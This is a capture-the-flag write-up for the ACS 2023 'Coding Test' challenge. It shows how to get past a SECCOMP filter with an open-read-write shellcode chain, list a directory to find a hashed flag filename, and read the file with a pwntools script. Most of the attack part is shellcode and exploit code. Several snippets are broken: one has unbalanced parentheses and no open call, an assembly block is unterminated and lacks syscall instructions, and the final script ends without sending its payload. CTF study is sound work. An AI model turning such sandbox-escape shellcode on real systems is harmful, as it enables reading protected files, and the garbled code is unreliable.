ACS 2023: Coding Test

Test your coding skills!


Restricted shellcode challenge with bypassable SECCOMP filter via Open-Read-Write (ORW) chain.

Challenge Overview

Coding Test is a simple shellcode injection challenge that allows the user to write to an allocated buffer that is subsequently executed.

However, there are some SECCOMP constraints that we have to bypass.

Constructing ORW Chain

Since execve and execveat is blacklisted, making it impossible to spawn a shell, we can instead use an open > read > write (ORW) chain to read file contents from the remote system.

shellcode = asm("flag.txt"))
shellcode += asm(shellcraft.linux.syscall("SYS_read", "rax", "rsp", 0x100))
shellcode += asm(shellcraft.linux.syscall("SYS_write", 1, "rsp", "rax"))

Looking at the Docker File, the flag name is obscured by appending an MD5 hash. This makes it a little difficult to get the flag by reading the file directly.

FROM ubuntu:22.04
RUN apt-get update -y
RUN apt-get install -y xinetd
RUN apt-get install -y libseccomp-dev
RUN useradd -mU ctf_user
COPY ./coding_test /home/ctf_user/coding_test
COPY ./flag /home/ctf_user/flag
COPY ./xinetd /etc/xinetd.d/ctf_user
RUN chmod 750 /home/ctf_user /home/ctf_user/coding_test
RUN chmod 440 /home/ctf_user/flag
RUN chown -R root:ctf_user /home/ctf_user
RUN md5sum /home/ctf_user/flag | awk '{print $1}' | xargs -I {} mv /home/ctf_user/flag /home/ctf_user/flag_{}
CMD ["/usr/sbin/xinetd","-dontfork"]

To circumvent this, we can use openat to get all file names from the current directory:

shellcode = asm(shellcraft.openat(-1, '/home/ctf_user/').rstrip())
shellcode += asm('''
            mov rdi,rax
            xor rdx,rdx
            xor rax,rax
            mov dx,0x3210
            lea rsi,[rsp]
            mov al,217

            mov rax, 1
            mov rdi, 1
            mov rsi, rsp
            mov rdx, 500

Afterward, just substitute the value of the file name to read in the ORW chain as follows:

shellcode = asm("/home/ctf_user/flag_ed807a45f84463aac37414be73d5849c"))
shellcode += asm(shellcraft.linux.syscall("SYS_read", "rax", "rsp", 0x100))
shellcode += asm(shellcraft.linux.syscall("SYS_write", 1, "rsp", "rax"))

Flag: ACS{Y0ur_c0d!ng_skill4_ar3_passabl3!!!!}

Final Script


from pwn import *

exe = "./coding_test"
elf = context.binary = ELF(exe, checksec=False)

context.log_level = 'DEBUG'
warnings.filterwarnings(action='ignore', category=BytesWarning)

io = remote("", 10137)
#io = elf.process()

def main():
        # shellcode = asm(shellcraft.openat(-1, '/home/ctf_user/').rstrip())
        # shellcode += asm('''
        #             mov rdi,rax
        #             xor rdx,rdx
        #             xor rax,rax
        #             mov dx,0x3210
        #             lea rsi,[rsp]
        #             mov al,217
        #             syscall

        #             mov rax, 1
        #             mov rdi, 1
        #             mov rsi, rsp
        #             mov rdx, 500
        #             syscall
        #     ''')

        shellcode = asm("/home/ctf_user/flag_ed807a45f84463aac37414be73d5849c"))
        shellcode += asm(shellcraft.linux.syscall("SYS_read", "rax", "rsp", 0x100))
        shellcode += asm(shellcraft.linux.syscall("SYS_write", 1, "rsp", "rax"))

        print(io.recvuntil(b': '))

if __name__ == "__main__":

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